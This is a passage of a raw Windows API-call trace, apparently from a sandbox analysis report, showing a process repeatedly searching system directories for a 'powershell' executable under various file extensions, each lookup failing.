	[0326.940] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.940] SetErrorMode (uMode=0x1) returned 0x1
	[0326.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.940] SetErrorMode (uMode=0x1) returned 0x1
	[0326.940] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.941] SetErrorMode (uMode=0x1) returned 0x1
	[0326.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.941] SetErrorMode (uMode=0x1) returned 0x1
	[0326.941] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.941] SetErrorMode (uMode=0x1) returned 0x1
	[0326.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.941] SetErrorMode (uMode=0x1) returned 0x1
	[0326.942] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.942] SetErrorMode (uMode=0x1) returned 0x1
	[0326.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.942] SetErrorMode (uMode=0x1) returned 0x1
	[0326.942] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.942] SetErrorMode (uMode=0x1) returned 0x1
	[0326.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.943] SetErrorMode (uMode=0x1) returned 0x1
	[0326.943] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.943] SetErrorMode (uMode=0x1) returned 0x1
	[0326.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.943] SetErrorMode (uMode=0x1) returned 0x1
	[0326.943] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.943] SetErrorMode (uMode=0x1) returned 0x1
	[0326.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.944] SetErrorMode (uMode=0x1) returned 0x1
	[0326.944] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.944] SetErrorMode (uMode=0x1) returned 0x1
	[0326.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.944] SetErrorMode (uMode=0x1) returned 0x1
	[0326.945] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.945] SetErrorMode (uMode=0x1) returned 0x1
	[0326.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.945] SetErrorMode (uMode=0x1) returned 0x1
	[0326.945] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.945] SetErrorMode (uMode=0x1) returned 0x1
	[0326.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.946] SetErrorMode (uMode=0x1) returned 0x1
	[0326.946] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.946] SetErrorMode (uMode=0x1) returned 0x1
	[0326.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.946] SetErrorMode (uMode=0x1) returned 0x1
	[0326.946] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.947] SetErrorMode (uMode=0x1) returned 0x1
	[0326.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.947] SetErrorMode (uMode=0x1) returned 0x1
	[0326.947] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.947] SetErrorMode (uMode=0x1) returned 0x1
	[0326.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.948] SetErrorMode (uMode=0x1) returned 0x1
	[0326.948] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.948] SetErrorMode (uMode=0x1) returned 0x1
	[0326.948] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.948] SetErrorMode (uMode=0x1) returned 0x1
	[0326.948] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.949] SetErrorMode (uMode=0x1) returned 0x1
	[0326.949] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.949] SetErrorMode (uMode=0x1) returned 0x1
	[0326.949] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.949] SetErrorMode (uMode=0x1) returned 0x1
	[0326.950] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.950] SetErrorMode (uMode=0x1) returned 0x1
	[0326.950] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.950] SetErrorMode (uMode=0x1) returned 0x1
	[0326.950] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.950] SetErrorMode (uMode=0x1) returned 0x1
	[0326.950] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.951] SetErrorMode (uMode=0x1) returned 0x1
	[0326.951] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.951] SetErrorMode (uMode=0x1) returned 0x1
	[0326.951] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.951] SetErrorMode (uMode=0x1) returned 0x1
	[0326.951] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.952] SetErrorMode (uMode=0x1) returned 0x1
	[0326.952] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.952] SetErrorMode (uMode=0x1) returned 0x1
	[0326.952] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.952] SetErrorMode (uMode=0x1) returned 0x1
	[0326.952] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.952] SetErrorMode (uMode=0x1) returned 0x1
	[0326.953] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.953] SetErrorMode (uMode=0x1) returned 0x1
	[0326.953] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.953] SetErrorMode (uMode=0x1) returned 0x1
	[0326.953] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.954] SetErrorMode (uMode=0x1) returned 0x1
	[0326.954] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.954] SetErrorMode (uMode=0x1) returned 0x1
	[0326.954] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.954] SetErrorMode (uMode=0x1) returned 0x1
	[0326.954] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.954] SetErrorMode (uMode=0x1) returned 0x1
	[0326.955] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.955] SetErrorMode (uMode=0x1) returned 0x1
	[0326.955] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.955] SetErrorMode (uMode=0x1) returned 0x1
	[0326.955] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.955] SetErrorMode (uMode=0x1) returned 0x1
	[0326.956] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.956] SetErrorMode (uMode=0x1) returned 0x1
	[0326.956] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.956] SetErrorMode (uMode=0x1) returned 0x1
	[0326.956] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.956] SetErrorMode (uMode=0x1) returned 0x1
	[0326.957] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.957] SetErrorMode (uMode=0x1) returned 0x1
	[0326.957] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.957] SetErrorMode (uMode=0x1) returned 0x1
	[0326.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.957] SetErrorMode (uMode=0x1) returned 0x1
	[0326.958] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.958] SetErrorMode (uMode=0x1) returned 0x1
	[0326.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.958] SetErrorMode (uMode=0x1) returned 0x1
	[0326.958] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.959] SetErrorMode (uMode=0x1) returned 0x1
	[0326.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.959] SetErrorMode (uMode=0x1) returned 0x1
	[0326.959] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.959] SetErrorMode (uMode=0x1) returned 0x1
	[0326.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0326.960] SetErrorMode (uMode=0x1) returned 0x1
